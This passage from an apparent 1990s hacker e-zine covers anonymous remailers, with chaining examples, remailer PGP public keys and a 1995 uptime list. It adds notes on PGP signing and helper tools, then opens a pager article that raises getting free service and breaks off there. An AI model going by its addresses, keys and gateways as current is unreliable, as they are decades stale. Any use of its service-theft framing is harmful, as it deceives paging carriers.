mg5n+remailer-help@andrew.cmu.edu If you have a www browser, A help file on a similar service is available from http://www.c2.org/services/blind Anonymous postings to usenet can be made by sending anonymous mail to one of the following mail-to-usenet gateways (but the news gateways themselves do not make the message anonymous): group.name@news.demon.co. group.name@bull.com group.name@cass.ma02.bull.com group.name@charm.magnus.acs.ohio-state.edu group.name@comlab.ox.ac.uk group.name@paris.ics.uci.edu group.name@myriad.pc.cc.cmu.edu (Supports Crossposting) group.name.usenet@canaima.Berkeley.EDU group.name.usenet@decwrl.dec.com (Preserves all headers) The mail-to-news gateways do not anonymize messages; you must use a remailer if you want the message to be posted anonymously. Not all gateways support all newsgroups. You may have to try several to find one that supports the groups you wish to post to. It would also be advisable to try a post to alt.test before relying on any such system to function as expected. Also note that the last two require .usenet at the end of the address. In addition, you can cross-post to several newsgroups by adding the header Newsgroups: with the names of the groups you want to post to and sending it to mail2news@news.demon.co.uk or mail2news@myriad.pc.cc.cmu.edu (Use the ## feature with the remailers to add the header line) Examples: Simple Remailing: > From: joe@site.com > To: remail@c2.org > Subject: Anonymous Mail > > :: > Anon-To: beth@univ.edu > > This is some anonymous mail. Chaining remailers: > From: sender@origin.com > To: remailer@rebma.mn.org > > :: > Request-Remailing-To: remailer@myriad.pc.cc.cmu.edu > > :: > Request-Remailing-To: recipient@destination.com > > This is an anonymous message Adding extra headers to the output message: > From: suzie@euronet.co.uk > To: remailer@nately.ucsd.edu > > :: > Request-Remailing-To: mail2news@news.demon.co.uk > > ## > Subject: Ignore this test > Newsgroups: alt.test > Comments: This is only a test > > This message will be posted to alt.test! Cutmarks and delay: > From: sam@eric.com > To: remailer@xs4all.nl > Subject: ignore > > :: > Anon-To: alt.test@comlab.ox.ac.uk > Latent-Time: +15:30 > Cutmarks: -- > > This is an anonymous test. > Note that it does not have my .sig appended to it! > > -- > sam@eric.com - 310-853-1212 - This is my .sig - Finger for PGP key! The following are PGP public keys of the remailers which support encryption. Remember to use the Encrypted: PGP header! 1024-bit key, Key ID B5A32F, created 1992/12/13 -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3 mQCNAisrAP0AAAEEAJr3OwIfOIOoh9JndwwqFg+VyWFTAyM8S0B7wyGKI+A9sMAB mbSOIU52EszvLdZk8NH8mrOD9m3EZlt9gXOjln881RMilAunnzdXaJ6ffBKqPL+l yiefCbCo6wScVNfMSV6Di/2HMoFzVqukwRjTx8lqKt6hgy0uedtwcCemtaMvAAUR tCVSZW1haWxlciA8cmVtYWlsQGV4dHJvcGlhLndpbXNleS5jb20+iQCVAgUQK2SV p4OA7OpLWtYzAQG8eQP9F9ye/F/rXhJLNR5W/HV5k+f6E0zWSgtmTTWUYyydfJw+ lKDEDH6v+OFOFE3+fuTIL5l0zsNMSMdF5u7thSSWiwcFgaBFQF9NWmeL/uByOTSY tsB6DQSbw656SBH7c7V7jvUsPit/DubwBXZi9sOlULau3kQqXeeQxPhNE+bpMy6J AJUCBRArKwSLk3G+8Dfo40MBAXYAA/4hCVDFD0zG47pYPMg+y7NPE5LktWt2Hcwt Z4CRuT5A3eWGtG8Sd5QuHzbE4S9mD3CFn79bxZi0UDhryD8dsCG4eHiCpAcZqSvR JSkpgamdRaUQHNmMxv5goxHhRem6wXrKxZQNn5/S0NtQOrS6QKhFlGrzDIh/2ad1 J9qpyzJ/IYkARQIFECsrA9RLrSJixHgP9wEBNcEBewWpzywKk/SBDwocXebJmsT6 zug/ae78U/cu9kTX620Xcj1zqOdx9Y9Ppwem9YShaQ== =I7QE -----END PGP PUBLIC KEY BLOCK----- Anonymous Remailer 510-bit key, Key ID 5620D5, created 1992/11/15 -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3 mQBNAisGf+IAAAEB/ieS6th8hI1QBjGpmctVvsIxZBtmpykVXc3psh0XVfH4sECS ugouk2zm/PJtt59A2E5SO3xjpDjeKlkQ745WINUABRG0LFJlbWFpbGluZyBTZXJ2 aWNlIDxoZmlubmV5QHNoZWxsLnBvcnRhbC5jb20+iQCVAgUQK3Azm4OA7OpLWtYz AQHzawQAwZPaJUR9iNwyKMDm4bRSao0uu381pq6rR3nw0RI+DSLKTXPqDaT3xBmL dVv1PVguLcoao/TRLkAheV7CIxodEiI9lAC2o6lqSXCP+vm3jYmulSgUlKafXYbj LAbZpsKRAUjCpyx0wlYmoHhkA+NZDzMcWp6/1/rM/V1i4Jbt2+GJAJUCBRArBpKv qBMDr1ghTDcBASTlBACfTqODpVub15MK5A4i6eiqU8MDQGW0P0wUovPkNjscH22l 0AfRteXEUM+nB+Xwk16RG/GdrG8r9PbWzSCx6nBYb7Fj0nPnRPtS/u69THNTF2gU 2BD0j2vZF81lEHOYy6Ixao2b6Hxmab2mRta2eTg7CV6XP3eRFDPisVqgooAWgw== =arSc -----END PGP PUBLIC KEY BLOCK----- Remailing Service 510/0BB437 1992/11/12 -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3a mQBNAisCtU0AAAEB/jNOYzN1B2YzOxlK/Zb6axoOaGlPq5I7DV9GH3hcGRN5N6Fi T4sRLhi53Sc5rUdYDa8mFQd4tqvFG6rHcT8LtDcABRG0KlJlbWFpbGluZyBTZXJ2 aWNlIDxoYWxAYWx1bW5pLmNhbHRlY2guZWR1PokAlQIFECsGk/aoEwOvWCFMNwEB 24gEAJlpxL88gdKUxdgXCTCeFZ45bTbyiS0Mfy86iGthyuLRYjAEjJB5yerRaKDi JNOgCTvnO+I9YyFdXnPEpvBjqVfpqHF2WCc4f7BgzBbOKg79EyiOp2/eYIQT1Fkk cvisjRGlmHncfGgoq+OhVUw81imeSUPbv8vZyqskUU7djZKb =4W6s -----END PGP PUBLIC KEY BLOCK----- Remailer (remailer@rebma.mn.org) 1024/BA80A9 1992/11/26 -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3a mQCNAisUI2QAAAEEAKgm07Hsje5KpmXYd5azk0R6AES+qK7LcofnVGojUs7GBghD WbwrmW8oOEOhRorlShRALKeYspV4xYIw4WDkJcJxuf1B254scz1urF/Eem3zPW9b yPAx7W/cGwvs6SouZvFcSDq4v1zApvGE9hP4szPzHeGmVr0NVNeaDK0guoCpAAUR tCBSZW1haWxlciAocmVtYWlsZXJAcmVibWEubW4ub3JnKQ== =/qHx -----END PGP PUBLIC KEY BLOCK----- Tommy the Tourist 512/5E6875 1994/04/25 -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3a mQBNAi27mNAAAAECAONCUi/9jdl0SXGhOhT4Vvgl9uOYLgbOjU5kMXEkpFQriCYC hWfNuhH8zESs9DFTMHCXUsXYrkkm/bHdhGheaHUABRO0LlRvbW15IHRoZSBUb3Vy aXN0IDxyZW1haWxlckBzb2RhLmJlcmtlbGV5LmVkdT4= =aoJM -----END PGP PUBLIC KEY BLOCK----- vox.hacktic.nl 512/368B41 1994/04/29 -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3a mQBNAi3BYrsAAAECALbhXUJWvniV9bGz67lGnXqc3BOjRwVBV9pY9V6cJEfw/UOn R9Bi0WWDelp20Z6u+CHijrq7iaRyTL2DNtw2i0EABRG0KlZvWCBSZW1haWwgU2Vy dmljZSAgIDxhbm9uQHZveC5oYWNrdGljLm5sPokAlQIFEC3H6O5Z33QUjVaRPQEB P0oEAJKp0uOhkx7uAfUQGpYLL3RlBR2xomvYdbf/ES7DMn2eAast+cO0YWkveNO1 6h+7K1/AFa3G/q2R0alOoFFYd4J/G5hn/NBdvp3KylhEC5OCe40Qb151NpkF++OE dtUPu0qd9VlQPNhFzF37sdffkuk5Uaac1/UrPJLaYDQJYIBGtCpWb1ggUmVtYWls IFNlcnZpY2UgPHJlbWFpbEB2b3guaGFja3RpYy5ubD6JAJQCBRAtx+lIWd90FI1W kT0BAaBGA/ixWSQsCYDAOw8udVKzcqzjkzcvqDXoOTeoCRCW5yKFjLq/O+jydj0+ Y6sSHgQWeNQMYuLAq3PZWi66POhrXCrQNTdu2+Ni0Zq1UpjDE6D/6bg0ujvJd+Tr rycJq8B7T81RR/nlkQNkWRji8b1GJ1QAz/NSWuskOKEgsH5fsdvL =RRIj -----END PGP PUBLIC KEY BLOCK----- 1024/FD5A2D 1994/06/16 The NEXUS-Berkeley Remailer -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3a mQCNAi3/6FIAAAEEANggWtLprhvPDAdv503F5vChmF5jadD16dBke2yuP5iJwt0i X0eJC7dFoimNp03Cm7pkn5SkGr3i3hjtKLQGtneKNfdp29ELisOc9wMLiBMP46q3 Sr/9RseAt5Nnt4fW2Efi6xO8QLiMVG837gd5pEpXOqJ2FMCikEMvwOz0/VotAAUR tCtUaGUgTkVYVVMtQmVya2VsZXkgUmVtYWlsZXIgPHJlbWFpbEBjMi5vcmc+iQCV AgUQLf/owHi7eNFdXppdAQEctAP/aK+rTQxs5J8ev1ZtnYpGZPIEezQeC8z8kRdN jUKF7CutVLy09izYDSdonuHFyWoHtLb1RUj5fGUFhOzwmJTMlTRzEx8i2a1bKdmQ qPGNu2iVKIitkSSVZvz7vHXM+ZUFTSC4LGWsECukEONEeyGy+ehG3ON0vx1ATqY5 /ATzPpo= =N0yt -----END PGP PUBLIC KEY BLOCK----- Global Remail Services Ltd. 1024-bit key, Key ID 1FFADA15, created 1994/07/22 -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3 mQCNAi4wTh8AAAEEAMb9gl6NlZHy4FdjADel4d+C+Th7+inTOV4mEsKk+N/QfJAj BN6YPnJ9bm+Ch19FrR1KeTwrpluP6J+GdJrMkVSosvIqBPpSRgOs7nvMhnn3Tnrn uUFZVDYslQ1wRZvFbTpCEW8TzgVhGy6HMznxEC4ttnOq8pFRFUpL3asf+toVAAUR tC5HbG9iYWwgUmVtYWlsIFNlcnZpY2VzIEx0ZC4gPHVzdXJhQGhhY2t0aWMubmw+ =+iYx -----END PGP PUBLIC KEY BLOCK----- Desert Anonymous Remailing Service 512-bit key, Key ID 06B2A9, created 1994/04/27 -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3a mQBNAi2+t1EAAAECALUS6KI7WLBB47y5dDIN+vHAW2XLxu+ELJCNkHLKYxhAr6vY Ku1e9oMry+bHizW8wCt0JPWMlnzZOkhZplIGsqkABRG0O0Rlc2VydCBBbm9ueW1v dXMgUmVtYWlsaW5nIFNlcnZpY2UgPGFub25AZGVzZXJ0LmhhY2t0aWMubmw+iQBV AgUQLb63vZRymF15lPcFAQF88AH/TdqfNlZ2uNH/CpQiy6BneDa0+FJTmBFgy5W+ wcpbsljOFFheH3zz5zA2rkpxIBoy/nd4vQ9kaa6fc1TkVMeBfokAlQIFEC2+t6C+ ZjYIMi0DBQEBT4YD/0NK9fCG8JjE0fS/0SlFshWAGSZxUYREKoQiwo8/ZPEbORHa +a6E8mXOjy7XHVH00S8/1aOO+ji89FFY2aVNqVVDfZI53er9pZAeNSQ1mvD7isor B3IOQ+WeKgXL/IvOEaZro0ZA/FWtry0Ty7RZbPwX4j1TkBTxlRI08e2dG7YI =MfIT -----END PGP PUBLIC KEY BLOCK----- Nately remailer key -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAy5+B3EAAAEEALSM+nEA2RH5jFY70OF5x7CayihAw7N6SA+yCSt2c/lgSJT3 Mm0cy+TExUGGEOyWSbT7YA3BeGW6SLXyYYyo7NnA/O5t1lkqWxwSGKZ1te32OTQl 1TVowH93Oh9NpaFrHUs6S9DIg0Uce1EwrInAN1/giOTLGac1Uy8veFkOiI0BAAUX tC5OYXRlbHkgcmVtYWlsZXIga2V5IDxyZW1haWxlckBuYXRlbHkudWNzZC5lZHU+ iQCVAwUQLn4H7y8veFkOiI0BAQG4TwP/VXZiKX9mK+VT66i2ZJj3vAo/Qj5qp0sZ t+m3+tk8XDW1lXxf8ilTEfQNdPubQ/MxonQdJbFMBHjQKhJ6mN/jz0Ynnq2g8AfK LNDK49RM79Xf8N9uVeqRRZHOFA0+xe/eishxZh6sqLWCFd8s2sovOi4Xq7keRceo tnPbaOZYJQCJAJUDBRAufgewVWSTd1rHuGUBAVBzA/0R8XbDVXoQq1uLfjlioP0M MGI+xjV+kEX72HvHuyseEHEG1Xm4BEYVfr2z+jIkjxLgaezs4ibkLd/TQSyM9rtB 8rMA5UJWVjdkkQ/HkXCQIdEVOsNtOOFtwLeF1fIvv4u3d5GqJJ4Izy3qSFJwQ8Ww uXE2r18XZ4oTSuWKTjDmdw== =KXAP -----END PGP PUBLIC KEY BLOCK----- 1024/F626DD 1994/10/18 XS4all anonymous remailer -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.1 mQCNAi6kWukAAAEEANSylMdTreltF+CoGa5Bq69yjmzfbMWvrG+Fq1hQHAxP1M/6 3U1wT0wR2iESupnyQY6VNLK4p0Wcs2byHrb6HSlF98Hglg3DxGMMVEAEgKFwWnkD aznYqnI9JDm1an18bNGabsx0I75uzNcMbmLzUsV7Z8xJT8mPrpJlEsjW9ibdAAUR tC5YUzRhbGwgYW5vbnltb3VzIHJlbWFpbGVyIDxyZW1haWxlckB4czRhbGwubmw+ iQCVAgUQLqT+8pJlEsjW9ibdAQGD5AP8DEmnZ8EFPpKfisWT/uzxaGG4QzlFnmXs 2jYOXgr30yo5/3VRlrD2I9IfFVe8H8qhZR9f5kRmmC2aDmoers7LfnF/OAaN5aiS 4tZI17dnDiIW4swAY2x3hrx4hk3pF+IagmFtBV6Py1CGkwclx/frGozycNc/CA+B UI4JGy1/M10= =sjTO -----END PGP PUBLIC KEY BLOCK----- 1024/60A7E5 1994/11/01 Slovenian Anonymous Remailer -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAy61tPIAAAEEANQTaiQE/P6ZJrbd/jR0KXREmhHgnKS2hG5m/zCdmNiOPlyE UFyNMvmqqFX2PCLrvWWHdV1QQJeiXDu70TKLQTqB5tarCEDkDkgkHPbfl/xucShe PViUCRF6d9HYlBaZwTP0ugIp4lPldrdzndbtUz4XhtvmwX1QuEMgPeT1YKflAAUR tDRTbG92ZW5pYW4gQW5vbnltb3VzIFJlbWFpbGVyIDx0b21hekBmbGFtZS5zaW5l dC5vcmc+tBI8dG9tYXpAanB1bml4LmNvbT4= =n9y8 -----END PGP PUBLIC KEY BLOCK----- Key for user ID: A Free Zone Remailer 1024-bit key, Key ID 6A1F51, created 1994/11/11 -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAy7DR98AAAEEALgM8L/eeEV8ZD/AEUIW4zfk8tmZm/O4oMY/tjJlFqdWwIOt +aHS6Qw9d+DkXWnNro+Yw/VvIBW0d9DiObf7CkmVU2xPH/yBHgRWBlecwhiH1CeB emKJrgSkrU4SeQZqproAq4y8A0yjWLGGIRoxdPLAbMGXAE19SboZygiOah9RAAUT tCZBIEZyZWUgWm9uZSBSZW1haWxlciA8aG9tZXJAcmFodWwubmV0Pg== =Laqw -----END PGP PUBLIC KEY BLOCK----- PGP public key for Q Mixmaster Remailer -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAy7ASbEAAAEEAK9n3DbFIHngwpjKmzva3okS8bKXdWIYUGUwfuoT6iAGiAxU gvIq8J3JU4PMoseuRbBSfSuox9gtCDsH4V+UjCvrZvmU3Xtue7XS+Jez7V9MCTs9 GpjBB4he7OY/NKkAeP8r2PZmwRo2JXPprTfXfhpWeTNz8rhWNwiZepWNw3kVAAUT tBVRIFJlbWFpbGVyIDxxQGMyLm9yZz6JAJUDBRAuwE6iCJl6lY3DeRUBAecBA/9r hnsOi7aeqtfGLmnJ7UNI+lsGcVS7H9j9xc7+/S/tajyZl66u9KxMI2fKzKyoEWcj 9nEVEMbP+JdErqgpzwp0jkw1YLDY4mNd/gnynvE1oTwEzvIFdfkk7SrIymOx97GO 4WaU75ki2sWRkHgqv27vRSz7jOdl0DTNoj7yMCDMng== =s+IA -----END PGP PUBLIC KEY BLOCK----- Key for user ID: Cypherpunk Remailer 1024-bit key, Key ID F348CEB9, created 1994/12/22 -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAi75xYgAAAEEAKsaIyjZxn3saeSRkSZpkR/N52lREzU4RCLxUgDdnOxx402D whBpqFijPwPGvXXbjdySbGm1cFelhcftE4/5hx9KiEqn99+zShI9F5k411Zk28n7 H1+qeZabDlem5XRTsOUwt21JTB+EEH1J3Es1mBEcEk0wXpQJffOhnIrzSM65AAUR tCtDeXBoZXJwdW5rIFJlbWFpbGVyIDxyZW1haWxlckBhbHBoYS5jMi5vcmc+ =7N5G -----END PGP PUBLIC KEY BLOCK----- Key for user ID: Anonymous Remailer 1024-bit key, Key ID CD184D, created 1994/10/18 -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3a mQCNAi6kTXIAAAEEAN3nqh9LpPMwvMOl669R03VE6xBX7DsKRd8xigVpq+1E80al RszsToRJYsCDNRJBsjiImqyK2sja37Lqcjgc7qbqSEt7lJZkUfmTirh3OBr+t+J/ iT46TO3kRGuFzps2DGMa2aCC34I2BFyBU27KTqBIdAFZph9l5D/OEcH6zRhNAAUR tDJBbm9ueW1vdXMgUmVtYWlsZXIgPHJlbWFpbGVyQG15cmlhZC5wYy5jYy5jbXUu ZWR1Pg== =fUWC -----END PGP PUBLIC KEY BLOCK----- 1024/5F9071 1995/01/22 Syrinx Remailer -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAy8hy1cAAAEEAL5H5rkLnWGcRPltnm0NqIIQIgZpDH0UNbgnwOFDHZyyTnmK mwotc9X1gbRAk4Nn+g6zgmMiiPEUZGdwnvBtY9Sc4/eGyABhzVOqtBw+STQdEg89 avX7hf0eLfEfHRHnDYdpQFuibSwgrweFJ0SyF9nVo97rJXG1Z0KcU00qX5BxAAUR tB9TeXJpbnggUmVtYWlsZXIgPHN5cmlueEBjMi5vcmc+iQCVAwUQLyHOBEKcU00q X5BxAQF8+QP+L8P1mBStP80bqMpIzBs7TTZqQQJLZjU60K5edgH+P5Soc3tMmHRT +3CB7EX4gUvE4tp22FkvcmBrgdP0auBgZgaxYtVa9G5mVMfN5ODfrXnrsZOFzSln g35Hz46XSdzGoaRyYJVnOEyikgOsxgDVvxoFqTMEJUa0NWQP/hMNYiI= =8hEU -----END PGP PUBLIC KEY BLOCK----- Tower Anonymous Remailer 512-bit key, Key ID 5191BD, created 1995/01/22 -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQBNAy8iqAQAAAECALHjiFPr7Is0NptniDkYJ9UnRFM3Pn9Lz7mrPd58uo/EPMF5 bm3TjfAmdMlw2oBTtm7Ch3dsfBY44XEEwzVRkb0ABRG0NlRvd2VyIEFub255bW91 cyBSZW1haWxlciA8cmVtYWlsZXJAdG93ZXIudGVjaHdvb2Qub3JnPg== =Rfb5 -----END PGP PUBLIC KEY BLOCK----- Key for user ID: Anonymous Remailer Service 1024-bit key, Key ID A45C25, created 1994/11/02 -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAy638kkAAAEEAK6/4gF5jjNyJYuiOnR8N1u8kl43wHBzpWw8nkcqTtfYqXRO vtN6Ta5eupxAQ282IeD5BsZs7HyboOTOi6Y2HP9pMtP++9kzyeWOnoCH3VkHwy/q qfmrJT15uSsRGMUqgdwfdzvAYJz3dQBGUo1PBOtJY75WlGjh1G0v6hkhpFwlAAUR tDhBbm9ueW1vdXMgUmVtYWlsZXIgU2VydmljZSAgPHZhbmtsYXZhQGVuaWFjLmFj LnNpdWUuZWR1Pg== =/I8a -----END PGP PUBLIC KEY BLOCK----- The operation of this system of remailers is a group effort which relies on the contributions of many generous people. Please do not abuse the remailers. If you have problems with a remailer, some of the remailer operators can be contacted by sending mail to the remailer's address without a remailing request header. Otherwise, follow the instructions that come in the headers of messages from the remailer. Do not send complaints to postmaster at the site, unless the remailer operator specifies that as the address to make complaints. Many of the remailers are run by people who are not the general site administrators, and sending to the wrong address (ie postmaster@...) will most likely just make them annoyed at you, and won't get your problem resolved. If you can run an anonymous remailer, please volunteer to do so. Software is available from anonymous-FTP at ftp.csua.berkeley.edu in the directory /pub/cypherpunks/remailer/ Additional information and source code can be found at ftp cs.cmu.edu in the directory /afs/andrew.cmu.edu/usr12/mg5n/public/remailer or contact me and I'll send you what you need. The software can be run on most personal unix accounts. There are two usenet forums for discussion of anonymous remailer systems, alt.privacy.anon-server and alt.anonymous The newsgroup alt.anonymous.messages is a 'mail-drop' for anonymous parties to exchange encrypted messages. The cypherpunks mailing list is a forum for discussing ways to promote privacy via cryptography. To join, send mail to cypherpunks-request@toad.com Additional information on the anonymous remailers is available from http://www.cs.berkeley.edu/~raph/remailer-list.html -----------------------------END INSERTED FILE #2------------------------------ -----------------------------BEGIN INSERTED FILE #3---------------------------- REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list@kiwi.cs.berkeley.edu. $remailer{"vox"} = " cpunk pgp. post"; $remailer{"avox"} = " cpunk pgp post"; $remailer{"extropia"} = " cpunk pgp special"; $remailer{"portal"} = " cpunk pgp hash"; $remailer{"alumni"} = " cpunk pgp hash"; $remailer{"bsu-cs"} = " cpunk hash ksub"; $remailer{"rebma"} = " cpunk pgp hash"; $remailer{"c2"} = " eric pgp hash"; $remailer{"soda"} = " eric post"; $remailer{"penet"} = " penet post"; $remailer{"ideath"} = " cpunk hash ksub"; $remailer{"usura"} = " cpunk pgp. hash latent cut post"; $remailer{"desert"} = " cpunk pgp. post"; $remailer{"nately"} = " cpunk pgp hash latent cut"; $remailer{"myriad"} = " cpunk pgp hash latent cu t ek"; $remailer{"xs4all"} = " cpunk pgp hash latent cut post ek"; $remailer{"flame"} = " cpunk pgp hash latent cut post ek "; $remailer{"rahul"} = " cpunk pgp hash"; $remailer{"mix"} = " cpunk mix pgp hash latent cut e k ksub"; $remailer{"q"} = " cpunk mix pgp hash latent cut ek ksub"; $remailer{"syrinx"} = " cpunk pgp"; $remailer{"tower"} = " cpunk pgp"; $remailer{"eniac"} = " cpunk pgp hash latent cut ek "; $remailer{"charon"} = " cpunk hash latent cut ek"; $remailer{"bonafide"} = " cpunk hash latent cut e k"; $remailer{"ford"} = " cpunk hash latent cut ek"; $remailer{"aegis"} = " cpunk"; $remailer{"hroller"} = " cpunk hash"; $remailer{"vanka"} = " cpunk pgp hash latent cut ek"; $remailer{"enigma"} = " cpunk mix pgp hash latent cut ek ksub"; $remailer{"ain"} = " cpunk pgp"; catalyst@netcom.com is _not_ a remailer. lmccarth@ducie.cs.umass.edu is _not_ a remailer. JPUNIX.COM offers a domain hiding service for remailers. Send email to perry@jpunix.com for more information. NOTE: JPUNIX.COM itself does not run a remailer. All subdomains of jpunix.com on this list are remailers that are not physically located on jpunix.com Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys for the remailers. Fingering this address works too. Last ping: Tue 28 Feb 95 11:00:01 PST remailer email address history latency uptime ----------------------------------------------------------------------- tower remailer@tower.techwood.org *******+**** 4:14 99.99% mix mixmaster@nately.ucsd.edu +--+-.++++-+ 1:02:45 99.99% xs4all remailer@xs4all.nl ***+*+****** 7:22 99.99% myriad remailer@myriad.pc.cc.cmu.edu +*******+*+* 16:07 99.99% alumni hal@alumni.caltech.edu ************ 4:44 99.99% portal hfinney@shell.portal.com ************ 3:28 99.99% penet anon@anon.penet.fi --+-----+*++ 2:11:46 99.99% c2 remail@c2.org +++++++-++++ 28:41 99.98% q q@c2.org +-+--++-++-+ 54:56 99.98% usura usura@replay.com *****+****** 6:10 99.97% bsu-cs nowhere@bsu-cs.bsu.edu **-******+** 5:45 99.97% syrinx syrinx@c2.org +.-****-+*** 58:44 99.94% nately remailer@nately.ucsd.edu +-++..++++++ 46:08 99.93% vox remail@vox.xs4all.nl -.--------- 11:35:52 99.99% ideath remailer@ideath.goldenbear.com ----------- 4:10:11 99.83% rahul homer@rahul.net **********+ 6:47 99.74% hroller hroller@c2.org * *****-**** 9:29 99.66% bonafide remailer@bonafide.jpunix.com ********+* * 15:18 99.59% flame tomaz@flame.sinet.org ********+*+* 14:40 99.58% ain remailer@ain.jpunix.com *+ 10:21 99.52% charon charon@styx.jpunix.com ++*****-+* * 23:47 99.38% enigma mix@enigma.jpunix.com - 3:45:34 99.46% ford ford@prefect.jpunix.com + ++..++++ + 1:15:43 99.34% eniac vanklava@eniac.ac.siue.edu ********** * 6:04 98.73% soda remailer@csua.berkeley.edu .._.._._-. 8:51:18 98.63% aegis aegis@athena.jpunix.com *.-*** -+* + 1:56:51 98.12% vanka vanka@eniac.ac.siue.edu * **** ** ++ 16:38 97.88% rebma remailer@rebma.mn.org .- --+ --- 11:12:00 85.29% extropia remail@extropia.wimsey.com - __ 20:47:48 30.69% desert remail@desert.xs4all.nl 78:44:55 2.24% History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). Options and features cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. oldpgp Remailer does not like messages encoded with MIT PGP 2.6. Other versions of PGP, including 2.3a and 2.6ui, work fine. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. ek Encrypt responses in reply blocks using Encrypt-Key: header. special Accepts only pgp encrypted messages. --------------------------END INSERTED FILE #3-------------------------------- -- SIGNING AND IT'S SIGNIFICANCE What is Signing? Signing a plaintext message is a way of letting people know that it was really you who sent the message. That is another key feature of public key crypto- systems. Signing a message does a number of things. It creates an encrypted block at the bottom of your message containing information about the message, your public key id, etc.. Therefore the message cannot be altered and still pass a signature check. The signature check verifies that you are who you say you are, and that the message has not been altered since your signature. Signing someones public key is another useful validation technique. If you sign someone's public key, it is saying that you know that they are who they say they are. Needless to say, it would be quite a pain in the ass to have to encrypt, sign, chain, etc.. everything manually, and that is one of the main reasons I've heard a lot of people say they don't use encryption, because it's too much of a hassle to deal with it. Well, hopefully the next section here will cure some of those woes. -- WAYS TO EASE THE PAIN Well, I do realize this seems like quite a painful process, but there are a lot of helpful tools out there to make it a bit easier to use these services. I will also rate each program on a 4 star rating scale. This has nothing to do with the quality of the program, but with how useful it is in real use applications as rated by ME. If you want to form your own opinions, feel free, get these programs! PGPSH32A.ZIP - PGP Shell vers 3.2a. A Nice tool to automate key management, * * x signing, etc. Main Drawback: No external editor support, built in editor sucks.(2.5 * would be 4 if it could support a real editor.) PGPBLU17.ZIP - PGP Interface for Blue Wave Offline Mail Reader. Easy to use * * * * signing, encrypting, etc.. All wrapped up in a nice interface. Easy to install, easy to use. BW2.10+ supports QWK too, so you can use it with your email and usenet. CHAIN.ZIP - Also comes in a tgz archive for unix. Automates chaining * * * mail through anon remailers. You can configure it to keep your favorite ones handy. Comes with DOS executable and C source. (Note: The .tgz archive is actually a completely different package. It is a set of perl scripts designed to help chain remailers. These packages are by different authors also.) DOSBAT.ZIP - For unix, look for scripts.tar.z. A collection of batch files * * * | (or scripts) that automates lots of things in regard to chaining remailers. Creates reply blocks, chains messages, etc.. A great package. MEDUSA1B.ZIP - Medusa's Tentacles - Great system using a fuzzy logic algorithm * * * * to strip all identifying information from a anon post/mail message. VERY cool. MESS11B.ZIP - Message Encryption and Signing System. Nice if you want to keep * * your public key on whatever system you use for mail. Otherwise it seems a lot like the PGPBLUE interface. Not recommended unless you are sending mail from your local site. If you are, then it is an excellent substitute for PGPBLUE. premail0.30.tar.gz - An excellent script package for preparing your mail for * * * The long journey through the remailing chain. APGP212.ZIP - Also comes as source for unix as autopgp*.tar.gz. AutoPGP is * * * a nice pre-post mail handler for QWK packets. It will search your packet for encrypted messages/mail, new keys, etc.. before you get to the mail. A nice package overall. Also, if you really get into it, the source for remailers and such is widely available. You can run your own quite easily. These are but a few of MANY, MANY good programs to help streamline your encryption needs. a couple of places to start are: ftp.csua.berkeley.edu /pub/cypherpunks - This is the main cypherpunk ftp site. You can find a lot of interesting stuff here. ftp.dsi.unimi.it /pub/security/crypto - Here you can find a bunch of illegally exported crypto. Everything imaginable is probably on this site. also: check out the web links from http://www.csua.berkeley.edu/cypherpunks.html All in all, the cypherpunks home page sucks, but it is a good place to find other good crypto links. -- IN CLOSING I hope this file has been somewhat helpful in demonstrating the need for the use of cryptography in your everyday communications. In researching this file, I have learned a few extra things myself. Enjoy, and Encrypt. Great and mighty thanks be to: Phil Zimmermann (For being a hero for the cause of privacy!) Matt Ghio (Author of the remailer help file) Raph Levien (Author of the remailer information file and operator of the remailer pinging service (from which the file was derived)) And to the author of the chaining help file, whoever he or she may be. Ghost in the Machine gitm@alpha.c2.org ----------------------------------------------------------------------------- Time For a Change presents pagers...PAGERS...pAgErS...PaGeRs...PagerS... by Major ------------------------------------------------------------------------------ BASICS (stuff you already know) ------------------------------- Pagers are radio receivers, capable of decoding and displaying numeric, and sometimes alpha, messages. Pagers operate in a state of perpetual reception, and whenever the system sends a message keyed to a particular pager, the pager responds by giving an alert (either audible beeps, or vibration), and displays the message. SERVICE -------------------------------- Pager service is cheap. Damn cheap. A month's worth of service should cost less than $10. So, there isn't much of a financial reason to have to hack free paging service. But... There are very few companies that provide paging service in any given area, yet there are multitudes of companies that sell the service. These are "agents" or "resellers". In order to activate 